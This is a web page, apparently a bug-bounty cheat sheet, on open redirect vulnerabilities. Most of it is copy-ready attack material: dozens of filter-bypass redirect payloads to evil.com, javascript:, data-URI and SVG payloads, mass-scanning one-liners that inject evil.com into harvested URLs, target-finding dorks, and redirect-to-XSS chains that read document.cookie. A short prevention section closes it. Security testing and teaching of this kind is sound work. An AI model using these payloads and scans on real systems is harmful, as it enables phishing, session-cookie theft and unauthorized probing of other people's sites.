Open Redirect Guide

Comprehensive guide to open redirect vulnerabilities, from basic domain spoofing to advanced filter bypasses and XSS chaining.

25+ Techniques10+ ToolsCopy Ready

Phase 0

Introduction

1What is Open Redirect?

Open Redirect = vulnerability allowing attackers to redirect users to malicious websites

2Root cause of the vulnerability

Occurs when web app accepts user input for URLs without proper validation

3Potential impacts even from simple redirects

Consequences: Phishing, malware distribution, session hijacking

Phase 1

Understanding Open Redirect Basics

1Basic example of an open redirect URL

https://example.com/redirect?url=http://malicious.com

Manual 2

Manual Testing 1: Simply Change the Domain

1#1 Most basic bypass - replace target domain with malicious one

?redirect=https://example.com → ?redirect=https://evil.com

Manual 3

Manual Testing 2: Bypass Protocol Blacklist

1#2 Bypass when protocol (https://) is blacklisted

?redirect=https://example.com → ?redirect=//evil.com

Manual 4

Manual Testing 3: Bypass Double Slash Blacklist

1#3 Bypass when double slash (//) is blacklisted

?redirect=https://example.com → ?redirect=\\evil.com

Manual 5

Manual Testing 4: Bypass Using http: or https:

1#4 Bypass by omitting slashes after protocol

?redirect=https://example.com → ?redirect=https:example.com

Manual 6

Manual Testing 5: Bypass Using %40 (At Symbol)

1#5 Use encoded @ symbol to bypass domain checks

?redirect=example.com → ?redirect=example.com%40evil.com

Manual 7

Manual Testing 6: Bypass Only Checking Domain Name

1#6 Append attacker domain to end of target domain

?redirect=example.com → ?redirect=example.comevil.com

Manual 8

Manual Testing 7: Bypass Using Dot Encoding %2e

1#7 Use encoded dot to bypass domain filters

?redirect=example.com → ?redirect=example.com%2eevil.com

Manual 9

Manual Testing 8: Bypass Using Question Mark

1#8 Use query string to obscure original domain

?redirect=example.com → ?redirect=evil.com?example.com

Manual 10

Manual Testing 9: Bypass Using Hash %23

1#9 Use fragment to hide malicious domain

?redirect=example.com → ?redirect=evil.com%23example.com

Manual 11

Manual Testing 10: Bypass Using Symbol

1#10 Use path separator to add malicious domain

?redirect=example.com → ?redirect=example.com/evil.com

Manual 12

Manual Testing 11: Bypass Using Chinese Dot %E3%80%82

1#11 Use Unicode-encoded Chinese dot to bypass filters

?redirect=example.com → ?redirect=evil.com%E3%80%82%23example.com

Manual 13

Manual Testing 12: Bypass Using Null Byte %0d/%0a

1#12 Inject null bytes to break validation

?redirect=/ → ?redirect=/%0d/evil.com

Manual 14

Manual Testing 13: Encoded URL Redirects

1#13 Use full URL encoding to bypass filters

https://example.com/redirect?url=http%3A%2F%2Fmalicious.com

Manual 15

Manual Testing 14: Path-Based Redirects

1#14 Use path-style redirects instead of query parameters

https://example.com/redirect/http://malicious.com

Manual 16

Manual Testing 15: Data URI Redirects

1#15 Use data URIs to execute arbitrary content

https://example.com/redirect?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnVGhpcyBpcyBhbiBhdHRhY2snKTwvc2NyaXB0Pg==

Manual 17

Manual Testing 16: JavaScript Scheme Redirects

1#16 Use javascript: scheme to execute JS

https://example.com/redirect?url=javascript:alert('XSS');//

Manual 18

Manual Testing 17: Open Redirect via HTTP Header

1#17 Inject redirect headers directly

Location: http://malicious.com
X-Forwarded-Host: evil.com
Refresh: 0; url=http://malicious.com

Manual 19

Manual Testing 18: Path Traversal Hybrids

1#18 Combine path traversal with redirect

/redirect?url=/../../https://evil.com

Manual 20

Manual Testing 19: SVG Payload

1#19 Use SVG with onload to redirect

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="window.location='https://evil.com/'" xmlns="http://www.w3.org/2000/svg"></svg>

Manual 21

Manual Testing 20: Case-Sensitive Variations

1#20 Use random casing to evade blacklists

//GOOGLE.com/ → Bypass case-sensitive filters

2#20 Variant with mixed casing

//GoOgLe.com/ → More random casing variations

Manual 22

Manual Testing 21: Trailing Special Characters

1#21 Use trailing fragment

//google.com/#/ → Fragment to obscure redirect

2#21 Variant with ampersands

//google.com/;&/ → Extra special characters

Manual 23

Manual Testing 22: IP Address Variants

1#22 Use decimal encoding for IP

http://3232235777 → Decimal IP for 192.168.1.1

2#22 Variant with hex encoding

http://0xC0A80001 → Hexadecimal IP

Manual 24

Manual Testing 23: IPv6 Notation

1#23 Use IPv6 notation to bypass filters

http://[::1]/ → IPv6 loopback

2#23 Variant with IPv4-mapped IPv6

http://[::ffff:192.168.1.1]/ → IPv4-mapped IPv6

Manual 25

Manual Testing 24: Non-Standard Ports

1#24 Use non-standard ports to bypass filters

http://google.com:81 → Different port

2#24 Variant with HTTPS port

https://google.com:444 → HTTPS on different port

Manual 26

Manual Testing 25: Unicode Obfuscation in Paths

1#25 Inject Unicode characters to break parsing

/%E2%80%http://8Egoogle.com → Unicode injection

2#25 Variant with different Unicode bytes

/%C2%http://A0google.com → More unicode obfuscation

Tool 27

Automated Tools 1: Reconnaissance (Single Domain)

1Collect URLs from multiple sources for single domain

echo target.com | gau --o urls1.txt
echo target.com | katana -d 2 -o urls2.txt
echo target.com | urlfinder -o urls3.txt
echo target.com | hakrawler > urls4.txt

Tool 28

Automated Tools 2: Reconnaissance (Multiple Subdomains)

1Collect all subdomains first, then gather URLs

subfinder -d target.com -all -o subdomains1.txt
assetfinder --subs-only target.com > subdomains2.txt
sort -u subdomains.txt subdomains2.txt -o uniqsubs.txt
cat uniqsubs.txt | httpx-toolkit -o finallist.txt

Tool 29

Automated Tools 3: Filtering URLs for Redirect Parameters

1Filter URLs containing common redirect parameters

cat final.txt | grep -Pi "returnUrl=|continue=|dest=|destination=|forward=|go=|goto=|login?to=|login_url=|logout=|next=|next_page=|out=|g=|redir=|redirect=|redirect_to=|redirect_uri=|redirect_url=|return=|returnTo=|return_path=|return_to=|return_url=|rurl=|site=|target=|to=|uri=|url=|qurl=|rit_url=|jump=|jump_url=|originUrl=|origin=|Url=|desturl=|u=|Redirect=|location=|ReturnUrl=|redirect_url=|redirect_to=|forward_to=|forward_url=|destination_url=|jump_to=|go_to=|goto_url=|target_url=|redirect_link=" | tee redirect_params.txt

2More effective approach using gf tool pattern

final.txt | gf redirect | uro | sort -u | tee redirect_params.txt

3CoffinXP GF pattern for redirect parameters

https://github.com/coffinxp/GFpattren/blob/main/redirect.json

Tool 30

Automated Tools 4: Final Exploitation Phase

1Test all filtered URLs with evil.com payload

cat redirect_params.txt | qsreplace "https://evil.com" | httpx-toolkit -silent -fr -mr "evil.com"

2One-liner for single target domain

subfinder -d vulnweb.com -all | httpx-toolkit -silent | gau | gf redirect | uro | qsreplace "https://evil.com" | httpx-toolkit -silent -fr -mr "evil.com"

Tool 31

Automated Tools 5: Bypass Payloads Testing

1Test all bypass payloads from custom list

cat redirect_params.txt | while read url; do cat loxs/payloads/or.txt | while read payload; do echo "$url" | qsreplace "$payload"; done; done | httpx-toolkit -silent -fr -mr "google.com"

Tool 32

Automated Tools 6: Fuzzing with FFUF

1Fuzz redirect parameters with bypass payloads, proxy to Burp

ffuf -w redirect_params.txt:PARAM -w loxs/payloads/or.txt:PAYLOAD -u "https://site.com/bitrix/redirect.php?PARAM=PAYLOAD" -mc 301,302,303,307,308 -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" -x http://localip:8080 -t 10 -mr "Location: http://google.com"

Tool 33

Automated Tools 7: Testing with CURL

1Mass test open redirects with CURL

cat urls.txt | qsreplace "https://evil.com" | xargs -I {} curl -s -o /dev/null -w "%{url_effective} -> %{redirect_url}\n" {}

Tool 34

Automated Tools 8: Nuclei Template

1Automated scanning with Nuclei open redirect template

echo subdomains.txt | nuclei -t openRedirect.yaml -c 30

Tool 35

Automated Tools 9: VirusTotal

1Use VirusTotal API to find redirect URLs

https://www.virustotal.com/vtapi/v2/domain/report?apikey=<api_key>&domain=target.com

2Process VirusTotal results with gf

./virustotal.sh domains.txt | gf redirect

3Custom bypass payloads list

https://github.com/coffinxp/loxs/blob/main/payloads/or.txt

Tool 36

Automated Tools 10: Loxs Tool

1Prepare URLs for Loxs tool

cat urls.txt | sed 's/=.*/=/' | uro >final.txt

2Simpler way to find open redirects

Use Loxs tool for automatic open redirect detection with no false positives

Chaining 37

Open Redirect to XSS (ATO) - Increase Impact

1#Basic payload, javascript code executed after 'javascript:'

javascript:alert(1)

2#Bypass 'javascript' word filter with CRLF

java%0d%0ascript%0d%0a:alert(0)

3#Javascript with '://' + double encoding, bypasses PHP FILTER_VALIDATE_URL

javascript://%250Aalert(1)

4#Variation with query string using comments/ternary operator

javascript://%250Aalert(1)//?1

5#Tab-separated javascript to bypass filters

%09Jav%09ascript:alert(document.domain)

6#Capitalized 'Alert' to evade case-sensitive filters

javascript://%250Alert(document.location=document.cookie)

7#Path-based javascript injection

/%09/javascript:alert(1);

8#Using encoded backslash to bypass filters

//%5cjavascript:alert(1);

9#Mixed case + CRLF to bypass filters

javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)

10#Variant with confirm() instead of alert()

javascript:confirm(1)

11#Bypass whitelist by hiding payload in query string

javascript://https://whitelisted.com/?z=%0Aalert(1)

12#Advanced whitelist bypass with CRLF

jaVAscript://whitelisted.com//%0d%0aalert(1);//

13#Using encoded spaces in payload

javascript://whitelisted.com?%a0alert%281%29

14#Obscure path-based payload

/x:1/:///%01javascript:alert(document.cookie)/

Dorking 38

Google Dorking & Automation

1Google dork to find URLs with redirect parameters

site:target (inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= | inurl:dest= | inurl:target= | inurl:redirect_uri= | inurl:redirect_url= | inurl:checkout_url= | inurl:continue= | inurl:return_path= | inurl:returnTo= | inurl:out= | inurl:go= | inurl:login?to= | inurl:origin= | inurl:callback_url= | inurl:jump= | inurl:action_url= | inurl:forward= | inurl:src= | inurl:http | inurl:&)

2Simplified dork for specific target

inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:target

3Process dork results with gf + qsreplace + httpx

cat urls.txt| gf redirect | uro | qsreplace "https://evil.com" | httpx-toolkit -silent -fr -mr "evil.com"

4Test all bypass payloads on dork results

cat urls.txt| gf redirect | uro | while read url; do cat /home/coffinxp/loxs/payloads/or.txt | while read payload; do echo "$url" | qsreplace "$payload"; done; done | httpx-toolkit -silent -fr -mr "google.com"

Impact 39

Risks and Impacts

1Most common impact - steal user credentials

Phishing Attacks: Users tricked into entering credentials on fake websites

2Spread malware via trusted domain redirects

Malware Distribution: Redirecting to sites that automatically download malware

3Take over user accounts via session theft

Session Hijacking: Stealing session cookies through crafted URLs

Bounty 40

Bug Bounty Payouts

1Payout range for small targets

Small Websites: $50 — $200

2Payout range for medium targets

Mid-Sized Companies: $200 — $500

3Payout range for large targets

Big Corporations: $500 — $1000

4Higher payout when chained to account takeover

Open Redirect to ATO: $1000 — $5000

Defense 41

How to Prevent

1Most effective prevention method

#1: Whitelist URLs - Restrict redirection to trusted domains only

2Avoid full URLs in redirect parameters

#2: Use Relative Paths - Ditch full URLs for safer relative paths

3Strict input validation for redirect parameters

#3: Validate Inputs - Block any unknown or suspicious redirect values

4User awareness before external redirects

#4: Show Warnings - Notify users before redirecting to external websites

End 42

Conclusion

1Final takeaway

Open Redirect vulnerabilities remain a critical threat to web application security

2Summary of key points

By understanding technical aspects, detection methods, and prevention strategies, developers and security researchers can effectively mitigate risks

Tools

Tools & Resources

gau

Fetch URLs from AlienVault OTX, Wayback Machine, Common Crawl

katana

Next-generation crawling and spidering framework

Filter URLs by vulnerability type (redirect patterns)

qsreplace

Replace query string values in URLs

httpx-toolkit

Fast HTTP toolkit for probing URLs

Nuclei Templates

Official Nuclei template for open redirect

Loxs Tool

Automatic open redirect detection with no false positives

VirusTotal API

Use VirusTotal to find redirect URLs